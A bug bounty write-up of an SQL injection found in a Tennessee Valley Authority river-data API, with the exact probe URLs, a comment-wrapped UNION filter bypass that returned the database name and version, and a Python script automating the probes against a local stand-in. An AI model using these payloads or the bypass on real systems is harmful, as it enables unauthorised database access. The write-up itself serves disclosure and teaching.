I found an SQL injection using GitHub dorking and here's my short story.
BugBounty 2022. 4. 28. 08:23

Never forget about GitHub dorking.
Last year I was invited to the TVA VDP via HackerOne. After reviewing their scope, I started my recon flow.

I always start with GitHub dorking because it often turns up low-hanging fruit and sometimes hidden subdomains.

After a few minutes I discovered an interesting endpoint on a hidden subdomain. By hidden I mean a subdomain that ordinary subdomain enumeration tools don't find.

When gathering subdomains, never depend on automated tools alone.

Tip: also use the bing.com search engine; it sometimes turns up hidden endpoints as well.

The moment I saw the endpoint, I thought of SQL injection. Why? Because the code GVDA1 at the end of the path looked like a value being looked up directly in the database.

I added a single quote and the page responded with an MSSQL database error message. The probes below establish that the injection is in a string context (a quote breaks the query, a trailing line comment repairs it) and that the query returns a single column (ORDER BY 1 works, ORDER BY 2 does not):

https://soa.tva.gov/api/river/observed-data/PICT1'                          -> MSSQL database error message
https://soa.tva.gov/api/river/observed-data/PICT1'-- -                      -> no error
https://soa.tva.gov/api/river/observed-data/PICT1' ORDER BY 2-- -           -> database error
https://soa.tva.gov/api/river/observed-data/PICT1' ORDER BY 1-- -           -> no error
https://soa.tva.gov/api/river/observed-data/PICT1' UNION SELECT db_name()-- -  -> HTTP 400 response

I tried several UNION payloads and something was blocking all of them. After a few more attempts I found that wrapping the keyword in a comment got through: /*!50000Union*/

https://soa-accp.glbx.tva.gov/api/river/observed-data/-PICT1'+%2f*!50000union*%2f+SELECT+db_name()-- -

One thing worth knowing about why this works on this target: /*!50000 ... */ is MySQL's conditional-comment syntax, and SQL Server has no equivalent; T-SQL treats the whole /* ... */ block as an ordinary comment and discards it. What reaches the parser is therefore '-PICT1' SELECT db_name()-- -, which T-SQL runs as a second statement in the same batch (a semicolon between statements is optional in T-SQL). The filter was matching the literal keyword "union"; the comment hid it from the filter, and stacked statements did the rest. The leading "-" on PICT1 makes the original WHERE clause match no row, so only the injected result comes back.

Responded with the database name:

FEWSDW

https://soa-accp.glbx.tva.gov/api/river/observed-data/-PICT1'+%2f*!50000union*%2f+SELECT+@@version-- -

Responded with the MSSQL version:

Microsoft SQL Server 2017 (RTM-CU22-GDR) (KB4583457) - 14.0.3370.1 (X64)
    Nov 6 2020 18:19:52
    Copyright (C) 2017 Microsoft Corporation
    Enterprise Edition (64-bit) on Windows Server 2012 R2 Standard 6.3 <X64> (Build 9600: ) (Hypervisor)
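The probe sequence above (quote, quote plus comment, ORDER BY counting, then a UNION with the base value negated) is mechanical enough to script. Below is an added example, not code from the original post or from the TVA API, that runs the same three steps against a constructed SQLite-backed stand-in for the vulnerable handler and then against a parameterised version of it, so the reader can see which signals disappear once the fix is in. The table name, its three columns, the two sample rows and the endpoint function names are assumptions; sqlite_version() stands in for the db_name() and @@version calls used on MSSQL. The comment-wrapped UNION bypass is not reproduced here, since the stand-in has no keyword filter and SQLite does not run stacked statements.

```python
import sqlite3

# Added example, not code from the original post. A SQLite-backed stand-in for
# the vulnerable /api/river/observed-data/<code> endpoint. The table, its three
# columns and the two sample rows are constructed assumptions.

def _connect():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE observed_data (station TEXT, observed_at TEXT, value REAL)")
    con.executemany(
        "INSERT INTO observed_data VALUES (?, ?, ?)",
        [("PICT1", "2021-03-15T00:00:00Z", 12.5), ("GVDA1", "2021-03-15T00:00:00Z", 3.1)],
    )
    return con

def vulnerable_endpoint(code):
    """Builds the query by string concatenation, which is what the leaked MSSQL
    error in the writeup implies the real API was doing.
    Returns (http_status, body) the way an HTTP handler would."""
    sql = f"SELECT station, observed_at, value FROM observed_data WHERE station = '{code}'"
    try:
        return 200, {"rows": _connect().execute(sql).fetchall()}
    except sqlite3.Error as exc:
        return 500, {"error": str(exc)}  # database error text leaks to the client

def fixed_endpoint(code):
    """Same query with a bound parameter: the input is data, never SQL."""
    sql = "SELECT station, observed_at, value FROM observed_data WHERE station = ?"
    return 200, {"rows": _connect().execute(sql, (code,)).fetchall()}

def looks_injectable(endpoint, base="PICT1"):
    """Step 1 of the writeup: a lone quote breaks the query and a quote followed
    by a line comment repairs it. Requiring both signals separates string-context
    injection from a handler that simply 500s on odd input."""
    quote_status, _ = endpoint(base + "'")
    comment_status, _ = endpoint(base + "'-- -")
    return quote_status != 200 and comment_status == 200

def count_columns(endpoint, base="PICT1", limit=20):
    """Step 2: ORDER BY n succeeds for n up to the column count and errors past
    it. Returns 0 if no probe succeeds and `limit` if none fails; the
    parameterised handler produces the latter, i.e. no usable signal."""
    found = 0
    for n in range(1, limit + 1):
        status, _ = endpoint(f"{base}' ORDER BY {n}-- -")
        if status != 200:
            break
        found = n
    return found

def union_extract(endpoint, expression, ncols, base="PICT1"):
    """Step 3: prefix the base value with '-' so the original WHERE matches no
    row, then UNION a SELECT padded with NULLs to the discovered column count.
    The injected expression comes back as the first column of the only row."""
    padding = ", NULL" * (ncols - 1)
    status, body = endpoint(f"-{base}' UNION SELECT {expression}{padding}-- -")
    if status != 200 or not body["rows"]:
        return None
    return body["rows"][0][0]

if __name__ == "__main__":
    for name, ep in (("vulnerable", vulnerable_endpoint), ("fixed", fixed_endpoint)):
        print(name, "endpoint injectable:", looks_injectable(ep))
    cols = count_columns(vulnerable_endpoint)
    print("columns in vulnerable query:", cols)
    print("sqlite_version() via UNION:", union_extract(vulnerable_endpoint, "sqlite_version()", cols))
```

Against the vulnerable handler the script reports an injectable string context, three columns and the engine version; against the parameterised handler every probe simply returns 200 with no rows, so looks_injectable is false and the ORDER BY loop never finds an upper bound. That absence of any differential response is the property the fix should have, and it is also why "no error" on its own is never proof that an endpoint is safe.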

Summary

Reported on Mar 15th 2021
Resolved on Mar 31st 2021
Agreed to disclose Apr 26th 2022


It's a short writeup, but I want to leave you with two lessons:

- Always do GitHub dorking in the early stages of your recon.
- There are plenty of filter bypasses out there; try them all.

Last but not least, here are some useful resources for learning about SQL injection:

http://www.securityidiots.com/

https://kaoticcreations.blogspot.com/

GitHub dorks:

https://kathan19.gitbook.io/howtohunt/sensitive-info-leaks/github-dorks

See you soon.

     
